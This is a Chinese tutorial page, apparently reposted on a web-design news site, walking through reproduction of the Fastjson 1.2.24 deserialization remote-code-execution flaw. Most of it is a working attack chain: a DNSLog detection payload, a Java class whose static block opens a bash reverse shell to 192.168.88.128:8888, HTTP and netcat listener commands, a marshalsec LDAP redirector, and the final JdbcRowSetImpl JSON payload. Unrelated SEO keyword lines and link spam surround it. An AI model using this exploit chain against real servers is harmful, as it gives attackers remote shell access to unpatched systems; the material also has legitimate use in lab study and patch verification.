当前位置: 首页 > news >正文

贵池网站建设网站建设国内外研究现状模板

贵池网站建设,网站建设国内外研究现状模板,做网站需要多少钱 爱问知识人,wordpress skype插件漏洞复现环境搭建请参考 http://t.csdnimg.cn/vSaaw kali切换jdk版本请参考 Kali安装JAVA8和切换JDK版本的详细过程_kali安装jdk8-CSDN博客 漏洞原理 Fastjson提供的com.sun.rowset.JdbcRowSetImpl类下的dataSourceName方法支持传入一个RMI/LDAP源,支持远程调用。…

漏洞复现环境搭建请参考

http://t.csdnimg.cn/vSaaw

kali切换jdk版本请参考

Kali安装JAVA8和切换JDK版本的详细过程_kali安装jdk8-CSDN博客

漏洞原理

Fastjson提供的com.sun.rowset.JdbcRowSetImpl类下的dataSourceName方法支持传入一个RMI/LDAP源,支持远程调用。攻击者只需要创建一个恶意指令类(写入反弹shell等恶意命令),设置RMI/LDAP服务的远程加载指向该恶意类,即可做到远程任意命令执行

漏洞版本

fastjson<=1.2.24

漏洞验证

(1)Web访问,JSON页面

(2)BP抓包,利用DNS回显验证,DNSLog Platform

(3)修改提交方式为POST,加入以下内容,放包,DNS回显则证明漏洞存在

#val的值为DNS申请的域名Content-Type:application/json{"a":{"@type":"java.net.Inet4Address","val":"q6teka.dnslog.cn"}
}

漏洞利用

(1)创建远程加载类,攻击机创建.java文件,内容如下,并进行java编译生成class文件

#执行反弹shell,注意文件名需要和class类名称创建的一样
import java.lang.Runtime;
import java.lang.Process;public class getshell {static {try {Runtime rt = Runtime.getRuntime();String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/192.168.88.128/8888 0>&1"};Process pc = rt.exec(commands);pc.waitFor();} catch (Exception e) {// do nothing}}
}

(2)开启攻击机HTTP服务和反弹shell端口的监听

python3 -m http.server 80
nc -lvvp 8888

(3)开启LDAP服务

#工具获取
git clone https://github.com/RandomRobbieBF/marshalsec-jar#开启LADP服务,端口6666,指定远程加载类为攻击机上的getshell
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.88.128:80/#getshell 6666      

(4)回到站点,BP抓包,发送恶意数据,内容如下

Content-Type:application/json
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://192.168.88.128:6666/getshell","autoCommit":true}
}

(5)放包,getshell

http://www.yayakq.cn/news/181679/

相关文章:

  • 大型购物网站建站电子商务营销的优势
  • 小程序开发框架seo官网优化怎么做
  • 网站有几种成都网站建设小公司排名
  • 布料市场做哪个网站好关于网站建设分类
  • 成都网站建设公司电话南京网站设计我选柚米科技
  • 怎么能将网站做的不简单wordpress如何加入点赞
  • 开创网站要怎么做大连网站运营制作方案
  • 体育彩票网站开发方案如何建免费的企业网站
  • 低价网站建设为您公司省去了什么整站seo怎么做
  • 和文化有关的吉网站建设模板温州15000 做网站的工作
  • 免费个人网站怎么建立如何自己做小程序免费
  • 男朋友抱着我在教室做网站wordpress改模版
  • 国外 网站页面设计基本网站怎么做
  • 邢台当地网站建设聊城网站seo
  • 自助建站工具网站制作公司嘉兴
  • 济南网站制作企业上海网站建设案例
  • 杭州网站制作建设智慧团建电脑版登录入口
  • 高端 网站建设常州网站备案
  • 做网站建设的名声很差吗怎样在各大网站做有效的宣传
  • 一般专业网站建设公司邢台无忧网站建设公司
  • 建设网站个人银行php网站在线打包源码
  • 南京网站设计公司排名南通网站建设找哪家
  • wordpress手机导航条怎么做怎样优化网站
  • 网站首页html代码在哪中国互联网金融协会平台官网
  • 枣阳网站开发公司哪家好红动中国素材网免费下载
  • 遵义 网站建设专业电商网站建设哪家好
  • 哪些网站做企业招聘不要花钱加工订单网
  • 现在主流的网站开发平台有哪些苏州seo关键词优化推广
  • 做pc网站如何实时预览谈谈对网站建设的认识
  • 外贸建站 宁波佛山seo按效果付费